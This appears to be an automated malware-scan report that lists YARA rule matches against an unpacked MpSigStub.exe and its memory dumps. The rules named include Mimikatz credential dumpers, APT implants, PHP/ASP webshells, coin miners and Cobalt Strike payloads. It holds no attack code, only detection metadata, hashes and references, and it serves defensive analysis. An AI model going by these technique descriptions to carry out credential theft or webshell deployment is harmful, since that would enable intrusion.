Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.18336077687.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18324883471.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000023.00000003.18285899877.0000015B1B2C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18285899877.0000015B1B2C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18323536692.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18411185064.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18411185064.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18330301023.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
